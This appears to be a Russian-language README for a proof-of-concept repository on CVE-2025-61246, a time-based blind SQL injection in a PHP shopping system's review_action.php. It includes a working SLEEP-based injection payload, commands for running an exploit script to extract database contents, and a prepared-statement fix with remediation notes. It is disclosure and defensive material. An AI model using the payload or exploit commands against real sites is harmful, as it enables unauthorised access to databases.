
CVE-2025-61246: SQL Injection vulnerability PoC in Online Shopping System PHP
Этот репозиторий содержит Proof of Concept (PoC) для CVE-2025-61246 — критической уязвимости SQL-инъекции, обнаруженной в PHP-приложении системы онлайн-покупок. Уязвимость позволяет неаутентифицированному злоумышленнику выполнять произвольные SQL-команды с помощью временной слепой SQL-инъекции.
/online-shopping-system-php-master/review_action.phpproIdУязвимость существует в конечной точке review_action.php, где вводимые пользователем данные из параметра proId напрямую включаются в SQL-запросы без надлежащей санации или параметризованных запросов. Это позволяет злоумышленнику внедрять вредоносные SQL-нагрузки, которые могут:
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);
Злоумышленник может воспользоваться этой уязвимостью следующим образом:
/online-shopping-system-php-master/review_action.phpproIdproId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
Этот репозиторий включает:
exploit.py) — Python-скрипт для обнаружения и эксплуатации уязвимостиMANUAL_TESTING.md) — пошаговые инструкции для ручной эксплуатацииdocker-compose.yml) — Docker-окружение для безопасного тестированияREMEDIATION.md) — практики безопасного кодирования и патчиPython 3.7+
pip install -r requirements.txt
# Клонирование репозитория
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246
# Установка зависимостей
pip install -r requirements.txt
# Запуск эксплойта
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php
# Только обнаружение (без эксплуатации)
python exploit.py --url http://target.com/review_action.php --detect-only
# Извлечение имени базы данных
python exploit.py --url http://target.com/review_action.php --extract-db
# Полная эксплуатация с настраиваемым таймаутом
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit
# Использование прокси для тестирования
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080
Успешная эксплуатация этой уязвимости может привести к:
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();
Подробные шаги по устранению см. в REMEDIATION.md.
⚠️ ВАЖНО: Данный PoC предоставляется только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Автор не несёт ответственности за неправомерное использование этой информации. Всегда получайте соответствующие разрешения перед тестированием.
Govind Pratap Singh
Этот проект распространяется под лицензией MIT — подробности см. в файле LICENSE.
Ответственное раскрытие: Если вы обнаружили уязвимость безопасности, пожалуйста, сообщите о ней ответственно вендору до публичного раскрытия.